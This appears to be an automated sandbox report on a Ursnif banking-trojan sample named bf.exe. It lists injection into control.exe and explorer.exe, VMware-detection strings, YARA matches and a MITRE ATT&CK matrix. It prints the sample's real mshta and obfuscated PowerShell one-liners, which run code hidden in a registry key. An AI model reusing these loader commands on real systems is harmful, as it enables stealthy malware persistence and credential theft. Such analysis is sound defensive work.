              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4756Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\n2sgiaoa.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4rgoqrxw.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9741Jump to behavior
              Source: C:\Users\user\Desktop\bf.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: explorer.exe, 0000000B.00000002.733204558.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
              Source: explorer.exe, 0000000B.00000000.686042828.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
              Source: explorer.exe, 0000000B.00000000.686042828.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
              Source: control.exe, 0000000C.00000002.723650816.00000262EC513000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 0000000B.00000002.739217384.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.716253522.000000000ECDA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: explorer.exe, 0000000B.00000000.686042828.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
              Source: control.exe, 0000000C.00000002.723789714.00000262EC534000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&u
              Source: mshta.exe, 00000004.00000002.635584727.00000212A473E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 0000000B.00000002.733204558.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\bf.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\bf.exeMemory written: C:\Windows\System32\control.exe base: 7FF7F7F712E0Jump to behavior
              Source: C:\Users\user\Desktop\bf.exeMemory written: C:\Windows\System32\control.exe base: 7FF7F7F712E0Jump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Users\user\Desktop\bf.exeThread register set: target process: 4784Jump to behavior
              Creates a thread in another existing process (thread injection)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 29561580Jump to behavior
              Source: C:\Windows\System32\control.exeThread created: unknown EIP: 29561580Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe" "about:<hta:application><script>ffsw='wscript.shell';resizeto(0,2);eval(new activexobject(ffsw).regread('hkcu\\\software\\appdatalow\\software\\microsoft\\54e80703-a337-a6b8-cdc8-873a517cab0e\\\testlocal'));if(!window.flag)close()</script>
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([system.text.encoding]::ascii.getstring((rxihymmmsf "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn))
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([system.text.encoding]::ascii.getstring((rxihymmmsf "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn))Jump to behavior
              Source: C:\Users\user\Desktop\bf.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([System.Text.Encoding]::ASCII.GetString((rxihymmmsf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdlineJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdlineJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2A5.tmp" "c:\Users\user\AppData\Local\Temp\CSCC346B8403E7B4A1592C575AE3967513E.TMP"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB8E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1B282484FFBD4A98A4CBD8847ACCD8A8.TMP"Jump to behavior
              Source: explorer.exe, 0000000B.00000000.667381073.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.711857959.00000000086BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.676177436.0000000005910000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 0000000B.00000000.667381073.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.699898010.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.723876903.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
              Source: explorer.exe, 0000000B.00000000.667381073.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.699898010.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.723876903.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: explorer.exe, 0000000B.00000000.667381073.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.699898010.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.723876903.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: explorer.exe, 0000000B.00000000.666643189.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.723069999.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.696674053.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\bf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\System32\control.exeCode function: 12_2_004963E0 CreateMutexExA,GetUserNameA,12_2_004963E0

              Stealing of Sensitive Information

              barindex
              Yara detected Ursnif
              Source: Yara matchFile source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.615812905.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTR
              Source: Yara matchFile source: 0.3.bf.exe.13294a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.12aa4a0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.12aa4a0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.1355940.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.13294a0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.1355940.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000000.681883913.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.613944350.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.680871269.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.684080193.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.614315107.0000000001329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Yara detected Ursnif
              Source: Yara matchFile source: 00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.615812905.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: bf.exe PID: 1364, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4604, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3324, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: control.exe PID: 4784, type: MEMORYSTR
              Source: Yara matchFile source: 0.3.bf.exe.13294a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.12aa4a0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.12aa4a0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.1355940.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.13294a0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.bf.exe.1355940.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000000.681883913.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.613944350.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.680871269.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.684080193.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.614315107.0000000001329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts2
              Windows Management Instrumentation              		Path Interception412
              Process Injection              		4
              Rootkit              		3
              Credential API Hooking              		1
              Security Software Discovery              		Remote Services1
              Email Collection              		Exfiltration Over Other Network Medium1
              Encrypted Channel              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts1
              Command and Scripting Interpreter              		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Masquerading              		LSASS Memory2
              Process Discovery              		Remote Desktop Protocol3
              Credential API Hooking              		Exfiltration Over Bluetooth1
              Ingress Tool Transfer              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
              Virtualization/Sandbox Evasion              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin Shares1
              Archive Collected Data              		Automated Exfiltration2
              Non-Application Layer Protocol              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)412
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput CaptureScheduled Transfer12
              Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
              Software Packing              		LSA Secrets1
              Account Discovery              		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              Remote System Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
